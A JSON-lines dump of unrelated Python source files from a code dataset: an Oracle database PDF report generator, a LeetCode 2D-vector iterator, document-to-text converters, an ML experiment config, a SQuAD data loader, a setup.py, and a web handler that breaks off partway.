self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库SQL排序资源统计'\n\n data = [('SQL_ID', 'SQL_TEXT', 'SORTS', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_sorts_top_hist()\n note = '注释:以上列出的是最近排序资源消耗排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 84, 80, 48)))\n i_number += 1\n\n story.append(PageBreak())\n story.append(Paragraph('5.2 日志增量统计', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' 
+ str(i_number) + ' ' + db['dbtitle'] + '数据库日志增长统计'\n\n ptitle = 'Log Increase'\n xlabel = 'Date'\n ylabel = 'Log Size(G)'\n try:\n results = oracle.log_increase()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[1])\n date.append(i[0])\n note = '注释:上图为数据库每日日志增长量。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3 数据库关键指标分析', self.headerLevelStyles[1]))\n story.append(Paragraph('5.3.1 Buffer Cache命中率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + 'Buffer Cache命中率'\n\n ptitle = 'Buffer Cache Hit Ratio'\n xlabel = ''\n ylabel = 'Ratio(%)'\n try:\n results = oracle.buffer_hit_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库最近Buffer Cache命中率情况,命中率越高,表示缓存在内存中的数据使用效率越高,当该值小于95%时,物理IO等待可能会出现,要分析该命中率低的原因。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3.2 Library Cache命中率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + 'Library Cache命中率'\n\n ptitle = 'Library Cache Hit Ratio'\n xlabel = ''\n ylabel = 'Ratio(%)'\n try:\n results = oracle.libraycache_hit_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库Library Cache命中率。这个比例通常应该保持在90%以上,否则就是库缓存太小或没有使用绑定变量。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3.3 软解析率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' 
+ str(i_number) + ' ' + db['dbtitle'] + '软解析率'\n\n ptitle = 'Soft Parse Ratio'\n xlabel = ''\n ylabel = 'Ratio(%)'\n try:\n results = oracle.soft_parse_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库软解析率。这个值小于95%说明硬解析有点多,需要注意。如果低于80%,执行计划的共享就出了严重问题,解决方法当然还是加大库缓存或使用绑定变量。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.3.4 内存排序率', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '内存排序率'\n\n ptitle = 'Memory Sorts Ratio'\n xlabel = ''\n ylabel = 'Ratio'\n try:\n results = oracle.memory_sort_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[3])\n date.append(i[0])\n note = '注释:上图为数据库内存排序率。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n\n story.append(Paragraph('5.4 数据库等待与事件分析', self.headerLevelStyles[1]))\n story.append(Paragraph('5.4.1 数据库等待(按等待类划分)', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库排名前十的等待(等待类)'\n\n data = [('WAIT_CLASS', 'TOTAL_WAITS')]\n\n try:\n results = oracle.wait_class_hist()\n note = '注释:以上列出的是排名前十的等待事件。'\n except Exception:\n results = [('', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(354, 100)))\n i_number += 1\n\n story.append(Paragraph('5.4.2 数据库等待(按事件划分)', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库排名前20的等待(事件)'\n\n data = [('EVENT_NAME', 'TOTAL_WAITS')]\n\n try:\n results = oracle.event_top_hist()\n note = '注释:以上列出的是排名前20的等待事件。'\n except Exception:\n results = [('', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(354, 100)))\n i_number += 1\n\n story.append(Paragraph('5.5 数据库undo使用统计', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' 
+ str(i_number) + ' ' + db['dbtitle'] + '数据库undo使用情况'\n\n ptitle = 'Undo Usage'\n xlabel = ''\n ylabel = 'Number Of Blocks'\n try:\n results = oracle.undo_usage_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n date = []\n activeblks = []\n unexpiredblks = []\n expiredblks = []\n for i in results:\n date.append(i[0])\n activeblks.append(i[1])\n unexpiredblks.append(i[2])\n expiredblks.append(i[3])\n note = '注释:上图为数据库最近Undo使用情况,其中横坐标表示收集数据的时间,纵坐标表示块的数量,activeblks表示正在使用的undo块,unexpiredblks表示占用时间在undo retention以内的undo块。根据Undo使用情况来对其大小进行适当调整,满足事务需要。'\n except Exception:\n activeblks = []\n unexpiredblks = []\n expiredblks = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n plt.figure(figsize=(20, 5))\n plt.plot([], [], color='m', label='activeblks')\n plt.plot([], [], color='c', label='unexpiredblks')\n plt.plot([], [], color='r', label='expiredblks')\n plt.stackplot(date, [activeblks, unexpiredblks, expiredblks], colors=['m', 'c', 'r'])\n\n plt.title('Undo Usage')\n plt.xlabel('Date')\n plt.ylabel('Number of Blks')\n plt.gcf().autofmt_xdate()\n plt.legend()\n\n imgdata = io.BytesIO()\n plt.savefig(imgdata, format='png')\n imgdata.seek(0) # rewind the data\n\n img = platImage(imgdata, 600, 180)\n\n story.append(img)\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.6 数据库总体性能', self.headerLevelStyles[1]))\n story.append(Paragraph('5.6.1 数据库负载情况', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库负载'\n\n ptitle = 'DB LOAD'\n xlabel = 'Date'\n ylabel = ''\n try:\n results = oracle.db_load_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[1])\n date.append(i[0])\n note = '注释:上图为数据库负载。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n story.append(Paragraph('5.6.2 数据库CPU使用情况', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '图5.' + str(i_number) + ' ' + db['dbtitle'] + 'CPU使用率'\n\n ptitle = 'CPU Usage Ratio'\n xlabel = 'Date'\n ylabel = 'Ratio'\n try:\n results = oracle.cpu_usage_hist()\n\n if len(results) > 30:\n results = results[-30:]\n\n data = []\n date = []\n\n for i in results:\n data.append(i[6])\n date.append(i[2])\n note = '注释:上图为数据库CPU使用率。'\n except Exception:\n data = []\n date = []\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n story.append(plot_curve(date, data, ptitle, xlabel, ylabel))\n story.append(Paragraph(title, makeTableTitleStyle()))\n story.append(Paragraph(note, makeBodyStyle()))\n\n i_number += 1\n\n\n return story\n\n\n def makeBackupPart(self):\n story = []\n story.append(PageBreak())\n\n i_number = 1\n story.append(Paragraph('6. 
数据库备份监测', self.headerLevelStyles[0]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表6.' + str(i_number) + ' ' + db['dbtitle'] + '数据库物理备份(RMAN)'\n data = [('DATABASE', 'TYPE', 'STATUS', 'ELAPSEDTIME', 'STARTTIME', 'INPUT_GB', 'OUTPUT_GB')]\n try:\n results = oracle.rman_backup()\n\n icount = 0\n\n for i in results:\n if i[2] == 'COMPLETED':\n icount += 1\n note = '注释:' + db['dbtitle'] + '最近1个月共有' + str(len(results)) + '次备份。其中成功备份' + str(icount) + '次, 失败备份' + str(len(results) - icount) + '次。'\n except Exception as e:\n print(e)\n results = [('', '', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n if len(results) > 20:\n results = results[0:10] + [('...','...','...','...','...','...','...')] + results[-10:]\n\n results = wrapTable(results)\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(48, 64, 67, 64, 83, 64, 64)))\n\n i_number += 1\n title = '表6.' + str(i_number) + ' ' + db['dbtitle'] + '数据库RMAN备份集'\n data = [('SET', 'TYPE', 'STATUS', 'STARTTIME', 'ELAPSED', 'SIZE', 'PATH')]\n try:\n results = oracle.rman_backupset()\n icount = 0\n for i in results:\n if i[2] == 'AVAILABLE':\n icount += 1\n note = '注释:' + db['dbtitle'] + '最近一个月共有' + str(len(results)) + '个备份集。其中可用备份集' + str(icount) + '个, 不可用备份' + str(len(results) - icount) + '个。'\n except Exception as e:\n print(e)\n results = [('', '', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n if len(results) > 20:\n results = results[0:10] + [('...','...','...','...','...','...','...')] + results[-10:]\n results = wrapTable(results, cols=(6))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(32, 32, 56, 88, 61, 32, 154)))\n\n i_number += 1\n\n return story\n\n def makeCurrentStatus(self):\n pass\n\n def makeLastPart(self):\n # 生产最后一页封面\n story = []\n story.append(NextPageTemplate('last_page'))\n story.append(PageBreak())\n story.append(Spacer(0, 0 * cm))\n\n return story\n\n\n def run(self, mode=None):\n # 添加文章各个部分\n story = []\n story.extend(self.makeFirstPart())\n story.extend(self.makeAuthorPart())\n story.extend(self.makeCopInfo())\n story.extend(self.makeContentPart())\n story.extend(self.makeManagedResourcetPart())\n story.extend(self.makeDBSummaryPart())\n if mode == 'month':\n story.extend(self.makeStoragePart())\n story.extend(self.makeDBObjectPart())\n story.extend(self.makePerformancePart())\n story.extend(self.makeBackupPart())\n\n if mode == 'now':\n story.append(self.makeCurrentStatus())\n\n story.extend(self.makeLastPart())\n\n # 创建pdf文档\n self.doc.multiBuild(story)\n \n\n\nif __name__ == '__main__':\n from utils import rptlogging\n # 导入配置文件\n from config import settings\n import os,sys\n \n# print(sys.path)\n \n path=settings.path_settings['resource'] + 'myreport.pdf'\n myconf = settings.ReportSetting(settings.path_settings['config'] + 'dbreport_gs.json')\n \n pdf = OracleReport(myconf,filename=path)\n \n logger = rptlogging.rptlogger(settings.ReportSetting().getPackageSetting()['logfile'])\n logger.info('Start generating report of database based on pdf format...')\n \n pdf.run()\n \n logger.info(\"Create pdf format report file: \" + '\"' + os.path.basename(path) + '\" successfully' + \" and it is saved to \" + '\"' + path + 
'\".')\n\n","sub_path":"report/oraclerpt.py","file_name":"oraclerpt.py","file_ext":"py","file_size_in_byte":67209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588139491","text":"###Implement an iterator to flatten a 2d vector.\n\n###For example,\n###Given 2d vector =\n\n###[\n### [1,2],\n### [3],\n### [4,5,6]\n###]\n###By calling next repeatedly until hasNext returns false, the order of\n###elements returned by next should be: [1,2,3,4,5,6].\n\n\nclass Vector2D(object):\n \n ###@param vec2d {List[List[int]]}\n def __init__(self, vec2d):\n ###Initialize your data structure here\n self.vec2d = vec2d\n self.row = 0\n self.col = 0\n \n ###@return {int} a next element\n def next(self):\n ###Write your code here\n val = self.vec2d[self.row][self.col]\n \n if self.col < len(self.vec2d[self.row]) - 1:\n self.col += 1\n elif self.row < len(self.vec2d) - 1:\n self.row += 1\n self.col = 0\n else:\n self.col += 1\n return val\n \n ###@return {boolean} true if it has next element\n ###or false\n def hasNext(self):\n ###Write your code here\n if self.col <= len(self.vec2d[self.row]) - 1:\n return True\n elif self.row < len(self.vec2d) - 1:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n vec2d = [[1, 2], [3], [4, 5, 6]]\n i, v = Vector2D(vec2d), []\n while i.hasNext():\n v.append(i.next())\n print(v)\n","sub_path":"Leetcode/0251-Flatten-2D-Vector.py","file_name":"0251-Flatten-2D-Vector.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"473332875","text":"import io\nfrom subprocess import Popen, PIPE\nfrom docx import Document\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfpage import PDFPage\n\ndef convert_pdf_to_txt(path):\n rsrcmgr = PDFResourceManager()\n retstr = io.StringIO()\n codec = 'utf-8'\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)\n fp = open(path, 'rb')\n # fp = path # path is _io.BufferedReader\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n password = \"\"\n maxpages = 0\n caching = True\n pagenos = set()\n\n for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages,\n password=password,\n caching=caching,\n check_extractable=True):\n interpreter.process_page(page)\n\n text = retstr.getvalue()\n\n fp.close()\n device.close()\n retstr.close()\n return text\n\ndef document_to_text(file_path):\n if file_path[-4:] == \".doc\":\n cmd = ['antiword', file_path]\n p = Popen(cmd, stdout=PIPE)\n stdout, stderr = p.communicate()\n return stdout.decode('ascii', 'ignore')\n elif file_path[-5:] == \".docx\":\n document = Document(file_path)\n paratextlist = document.paragraphs\n \n newparatextlist = []\n for paratext in paratextlist:\n newparatextlist.append(paratext.text)\n\n newtableparatextlist = []\n for table in document.tables:\n for row in table.rows:\n for cell in row.cells:\n for paragraph in cell.paragraphs:\n newtableparatextlist.append(paragraph.text)\n \n return '\\n\\n'.join(newparatextlist + newtableparatextlist)\n elif file_path[-4:] == \".odt\":\n cmd = ['odt2txt', file_path]\n p = Popen(cmd, stdout=PIPE)\n stdout, stderr = p.communicate()\n return stdout.decode('ascii', 
'ignore')\n","sub_path":"read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"256728512","text":"from sklearn.model_selection import ParameterGrid\nfrom metalearn.feature_extraction.transformers import SMILES_ALPHABET, MOL_ALPHABET, AMINO_ACID_ALPHABET, AdjGraphTransformer\n\ntransformer_ = AdjGraphTransformer()\ndataset_name = 'chembl'\ntest = True\n\nif test:\n shared_params_graph = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=True, max_examples_per_episode=10, batch_size=32, max_tasks=100)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\n\n shared_params_smiles = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=False, max_examples_per_episode=10, batch_size=32, max_tasks=100)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\nelse:\n shared_params_graph = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=True, max_examples_per_episode=10, batch_size=32)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\n\n shared_params_smiles = dict(\n dataset_name=[dataset_name],\n dataset_params=[dict(use_graph=False, max_examples_per_episode=10, batch_size=32)],\n fit_params=[dict(n_epochs=100, steps_per_epoch=500)],\n )\n\nfeatures_extractor_params_graph = list(ParameterGrid(dict(\n arch=['gcnn'],\n in_size=[transformer_.n_atom_feat], \n layer_sizes=[[512 for _ in range(2)]], \n )))\n\nfeatures_extractor_params_smiles = list(ParameterGrid(dict(\n arch=['cnn'],\n vocab_size=[1+len(SMILES_ALPHABET)],\n embedding_size=[20],\n cnn_sizes=[[512 for _ in range(2)]],\n kernel_size=[2],\n dilatation_rate=[2],\n pooling_len=[1],\n use_bn=[False],\n normalize_features=[False])))\n\n\ntask_descr_extractor_params = list(ParameterGrid(dict(\n arch=['cnn'],\n vocab_size=[1 + len(AMINO_ACID_ALPHABET)],\n embedding_size=[20],\n cnn_sizes=[[256 for _ in range(2)]],\n kernel_size=[5],\n dilatation_rate=[2],\n pooling_len=[1],\n use_bn=[False],\n normalize_features=[False])))\n\n\ndef f_metakrr_sk(graph): \n return dict(\n model_name=['metakrr_sk'],\n model_params=list(ParameterGrid(dict(\n l2=[0.1],\n lr=[0.001],\n do_cv=[False],\n fixe_hps=[True],\n kernel=['linear', 'rbf'],\n feature_extractor_params=features_extractor_params_graph if graph else features_extractor_params_smiles,\n ))),\n **(shared_params_graph if graph else shared_params_smiles)\n )\n\n\ndef f_maml(graph):\n return dict(\n model_name=['maml'],\n model_params=list(ParameterGrid(dict(\n lr_learner=[0.01],\n n_epochs_learner=[1],\n feature_extractor_params=features_extractor_params_graph if graph else features_extractor_params_smiles,\n ))),\n **(shared_params_graph if graph else shared_params_smiles)\n )\n\n\ndef f_mann(graph): \n return dict(\n model_name=['mann'],\n model_params=list(ParameterGrid(dict(\n memory_shape=[(64, 40)],\n controller_size=[100],\n feature_extractor_params=features_extractor_params_graph if graph else features_extractor_params_smiles,\n ))),\n **(shared_params_graph if graph else shared_params_smiles)\n )\n\nimport copy\ns_copy = copy.deepcopy(shared_params_graph)\ns_copy['dataset_params'][0].update(dict(raw_inputs=True))\nfingerprint = dict(\n model_name=['fingerprint'],\n model_params=list(ParameterGrid(dict(\n algo=['kr'],\n fp=['morgan_circular'],\n ))),\n **s_copy\n)\n\nseqtoseq = dict(\n model_name=['seqtoseq'],\n model_params=list(ParameterGrid(dict(\n embedding_dim=[256], \n 
encoder_layers=[2], \n decoder_layers=[2], \n dropout=[0.1],\n ))),\n **shared_params_graph\n)\n\nif test:\n metakrr_sk = f_metakrr_sk(True)\n maml = f_maml(True)\n mann = f_mann(True)\nelse:\n metakrr_sk = f_metakrr_sk(False)\n maml = f_maml(False)\n mann = f_mann(False)","sub_path":"expts_iscb19/configs/config_chembl.py","file_name":"config_chembl.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"642550060","text":"import argparse\nimport numpy as np\nimport pandas as pd\nimport data_loader\nfrom nltk.tokenize.moses import MosesTokenizer\nfrom keras.preprocessing.text import Tokenizer, text_to_word_sequence\nfrom keras.preprocessing.sequence import pad_sequences\n\nclass DataGenerator():\n def __init__(self,\n inputs=None,\n tokenized_corpus=None,\n embedding_vectors=None,\n embedding_dim=None,\n max_word_num=None,\n max_sequence_len=None):\n \n super(DataGenerator, self).__init__()\n \n self.data = None\n self.context_vector = None\n self.question_vector = None\n self.answer_token_index = None # [start_location, end_location]\n self.vocabulary = None\n self.tokenizer = None\n self.embedding_matrix = None\n self.embedding_dim = embedding_dim\n \n self.context_vector, self.question_vector = self.get_vector(inputs, tokenized_corpus, max_word_num, max_sequence_len)\n self.answer_token_index = self.char_to_token_loc_mapping()\n self.embedding_matrix = self.get_embedding_matrix(embedding_vectors, embedding_dim)\n \n def read_word_pair(self, input):\n t = {}\n f = open(input, 'r')\n \n for line in f:\n key_val = line.rstrip().rsplit(' ')\n \n if len(key_val[1:]) == 1: # to read vocabulary (key=word, value=index)\n t[key_val[0]] = int(key_val[1])\n else: # to read embedding vectors (key=word, value=embedding vector)\n t[key_val[0]] = np.asarray(key_val[1:], dtype='float32')\n f.close()\n \n return t\n \n def create_vocab(self, inputs, maximum_word_num):\n '''\n create vocabulary based on tokenzied corpus\n '''\n # make tokenizer. 
But just used for word indexer\n tokenizer = Tokenizer(num_words = maximum_word_num+1, filters='', oov_token='UNK')\n \n # fit on input (tokenized) corpus\n f = open(inputs, 'r')\n corpus = [line for line in f]\n tokenizer.fit_on_texts(corpus)\n \n # create vocabulary\n tokenizer.word_index = {word:index for word, index in tokenizer.word_index.items() if index <= maximum_word_num}\n vocabulary = tokenizer.word_index\n \n print('number of unique tokens: {}'.format(len(vocabulary)))\n \n return tokenizer, vocabulary\n \n def char_to_token_loc_mapping(self):\n '''\n Mapping from character location in context to the corresponding token locations.\n Then, add answer start/end token index columns to the data.\n original text: self.data.context[c_i]\n tokenized text: c_tk\n token index: self.data.context_tk_index[c_i]\n '''\n nltk_tokenizer = MosesTokenizer()\n \n answer_start_token_idx_list, answer_end_token_idx_list = [], []\n for c_i, c_tk in enumerate(self.data.context_tk):\n answer_start = nltk_tokenizer.tokenize(self.data.context[c_i][self.data.answer_start[c_i]:], escape=False) # context text from the first answer token to end\n answer_end = nltk_tokenizer.tokenize(self.data.context[c_i][:self.data.answer_end[c_i]+1], escape=False) # context text from the first to end of answer token\n \n answer_start_token_idx = len(c_tk)- len(answer_start)\n answer_end_token_idx = answer_start_token_idx # initialize to start token location\n \n for i, tk in enumerate(c_tk[answer_start_token_idx:]):\n if tk == answer_end[-1]: # add to the index as many steps as it's moved to find the end of answer token\n answer_end_token_idx += i\n break\n \n '''\n Codes for verification:\n print(self.data.answer_text[c_i]) - Saint Bernadette Soubirous\n print(c_tk[answer_start_token_idx:answer_end_token_idx+1]) - ['Saint', 'Bernadette', 'Soubirous']\n for m in range(answer_start_token_idx, answer_end_token_idx+1): - 849 39352 39353\n print(self.tokenizer.word_index[c_tk[m].lower()], end =' ')\n print(answer_start_token_idx, answer_end_token_idx) - 102 104\n '''\n \n pad_counts = np.count_nonzero(self.context_vector[c_i] == 0)\n \n answer_start_token_idx_list.append(answer_start_token_idx + pad_counts)\n answer_end_token_idx_list.append(answer_end_token_idx + pad_counts)\n # print(self.context_vector[c_i][answer_start_token_idx_list[c_i]:answer_end_token_idx_list[c_i]+1])\n \n return list(zip(answer_start_token_idx_list, answer_end_token_idx_list))\n\n def get_vector(self, inputs, tokenized_corpus, max_word_num, max_sequence_len):\n loader = data_loader.DataLoader(inputs)\n self.data = pd.DataFrame({'title': loader.title, 'context': loader.context, 'question':loader.question, 'answer_start':loader.answer_start, 'answer_end':loader.answer_end, 'answer_text':loader.answer_text})\n \n self.tokenizer, self.vocabulary = self.create_vocab(tokenized_corpus, max_word_num)\n \n # tokenization & add tokens, token indexes to columns\n nltk_tokenizer = MosesTokenizer()\n vectors = []\n for i, text_column in enumerate(['context' , 'question']):\n self.data[text_column + '_tk'] = self.data[text_column].apply(lambda i: nltk_tokenizer.tokenize(i.replace('\\n', '').strip(), escape=False))\n \n # token to index\n self.data[text_column+'_tk_index'] = self.tokenizer.texts_to_sequences(self.data[text_column + '_tk'].apply(lambda i: ' '.join(i)))\n \n # padding: It returns context, question vectors.\n vectors.append(pad_sequences(self.data[text_column+'_tk_index'], max_sequence_len[i]))\n\n return vectors\n\n def get_embedding_matrix(self, 
embedding_vectors, embedding_dim):\n trained_wv = self.read_word_pair(embedding_vectors) # read (pre)trained embedding word vectors\n print('number of trained word vector: {}'.format(len(trained_wv)))\n \n embedding_matrix = np.zeros((len(self.vocabulary)+1, embedding_dim)) # Glove: (-1, 100)\n for word, idx in self.vocabulary.items():\n embedding_wv = trained_wv.get(word)\n if embedding_wv is not None:\n embedding_matrix[idx] = embedding_wv\n # else:\n # print(word, idx, embedding_wv)\n print('embedding matrix shape: {}'.format(embedding_matrix.shape))\n\n return embedding_matrix\n\nif __name__ == \"__main__\":\n inputs = 'data/train-v1.1.json'\n tokenized_corpus = 'corpus.tk.txt'\n embedding_vectors = '/Users/hoyeonlee/glove.6B/glove.6B.100d.txt'\n embedding_dim = 100\n max_word_num = 100000\n max_sequence_len = [300, 30]\n\n gen = DataGenerator(inputs, tokenized_corpus, embedding_vectors, embedding_dim, max_word_num, max_sequence_len)\n","sub_path":"question-answering-SQuAD/my/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"184021042","text":"#!/usr/bin/python\n\nfrom setuptools import setup, find_packages\n\nwith open('README.md', 'r') as readme:\n long_description = readme.read()\n\nsetup(name='riptide',\n\tversion='3.1.3', \n\tdescription='Reaction Inclusion by Parsimony and Transcript Distribution (RIPTiDe)',\n\tauthor='Matthew Jenior',\n\tauthor_email='mattjenior@gmail.com',\n\turl='https://github.com/mjenior/riptide',\n\tpackages=find_packages(),\n install_requires=['cobra','symengine','scipy'],\n license='MIT',\n long_description_content_type='text/markdown',\n long_description=long_description)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"325324291","text":"from tools import db\n\nfrom tools.time_convert import *\nfrom tools.sql_mk import where_in\nfrom tools.network import url_req\nimport time\nimport copy\nfrom local_utils import *\nfrom local_utils import _group_by\nimport json\nfrom urllib.parse import quote\n\n\nspecial_auther_list = [\"shanghai\", \"zhejiang\"]\nauther_not_in = \", \".join([\"'%s'\" % special_auther for special_auther in special_auther_list])\n\n\ndef group_edit_error(self, group_id):\n check_date = self.get_argument(\"date\", \"\")\n check_date_end = self.get_argument(\"date_end\", \"\")\n status = self.get_argument(\"status\", \"99\")\n jd_status = self.get_argument(\"jd_status\", \"99\")\n auther = self.get_argument(\"auther\", \"default_auther\")\n channel = self.get_argument(\"channel\", \"\")\n error_level = self.get_argument(\"error_level\", \"\")\n key_word = self.get_argument(\"key_word\", \"\")\n res = get_group_edit_error(check_date, group_id, status, check_date_end, jd_status, auther, channel, error_level, key_word)\n self.write(json.dumps(res))\n\n\ndef get_group_edit_error(check_date, group_id, status, check_date_end, jd_status, auther, channel, error_level,\n key_word):\n # st = today_begin() if check_date == \"\" else time_str_to_ts(check_date + \" 00:00:00\")\n # et = st + 86400 if check_date_end == \"\" else time_str_to_ts(check_date_end + \" 00:00:00\")\n st = time_str_to_ts(check_date + \" 00:00:00\") if check_date != \"\" else \"\"\n if check_date_end != \"\":\n et = time_str_to_ts(check_date_end + \" 00:00:00\")\n elif st != \"\":\n et = st + 
